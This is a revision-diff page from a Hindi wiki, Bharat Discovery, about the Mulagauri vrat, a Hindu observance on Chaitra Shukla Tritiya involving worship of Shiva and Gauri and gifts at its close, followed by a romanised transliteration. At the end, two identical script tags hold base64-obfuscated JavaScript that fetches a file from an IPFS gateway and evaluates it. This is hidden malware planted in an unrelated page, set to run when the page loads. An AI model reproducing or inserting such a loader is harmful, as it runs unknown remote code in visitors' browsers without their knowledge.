Difference between revisions of "मूलगौरी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(6 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*[[चैत्र माह|चैत्र]] के [[शुक्ल पक्ष]] की [[तृतीया]] पर; तिल एवं जल से स्नान करना चाहिए; स्वर्ण फलों के साथ एवं पाँव से सिर तक [[शिव]] एवं [[गौरी]] की पूजा करनी चाहिए।  
+
*[[चैत्र माह|चैत्र]] के [[शुक्ल पक्ष]] की [[तृतीया]] पर यह व्रत किया जाता है।
 +
*तिल एवं जल से स्नान करना चाहिए।
 +
*स्वर्ण फलों के साथ एवं पाँव से सिर तक [[शिव]] एवं [[गौरी]] की पूजा करनी चाहिए।  
 
*बारह मासों में विभिन्न पुष्पों का उपयोगकरना चाहिए और इसी प्रकार विभिन्न पदार्थों को खाना या पीना चाहिए।  
 
*बारह मासों में विभिन्न पुष्पों का उपयोगकरना चाहिए और इसी प्रकार विभिन्न पदार्थों को खाना या पीना चाहिए।  
 
*गौरी के विभिन्न नामों की पूजा करनी चाहिए।  
 
*गौरी के विभिन्न नामों की पूजा करनी चाहिए।  
 
*कर्ता को एक फल छोड़ देना चाहिए और अन्त में एक पलंग, सोने के बैल एवं गाय का दान करना चाहिए।
 
*कर्ता को एक फल छोड़ देना चाहिए और अन्त में एक पलंग, सोने के बैल एवं गाय का दान करना चाहिए।
* शिव ने गौरी से चैत्र शुक्ल तृतीया पर विवाह किया था<ref>अग्नि पुराण (178|1-20)।</ref>।
+
*शिव ने गौरी से चैत्र शुक्ल तृतीया पर विवाह किया था<ref>[[अग्नि पुराण]] (178|1-20)।</ref>।
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 10:26, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr ke shukl paksh ki tritiya par yah vrat kiya jata hai.
  • til evan jal se snan karana chahie.
  • svarn phaloan ke sath evan paanv se sir tak shiv evan gauri ki pooja karani chahie.
  • barah masoan mean vibhinn pushpoan ka upayogakarana chahie aur isi prakar vibhinn padarthoan ko khana ya pina chahie.
  • gauri ke vibhinn namoan ki pooja karani chahie.
  • karta ko ek phal chho d dena chahie aur ant mean ek palang, sone ke bail evan gay ka dan karana chahie.
  • shiv ne gauri se chaitr shukl tritiya par vivah kiya tha[1].


tika tippani aur sandarbh

  1. agni puran (178|1-20).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>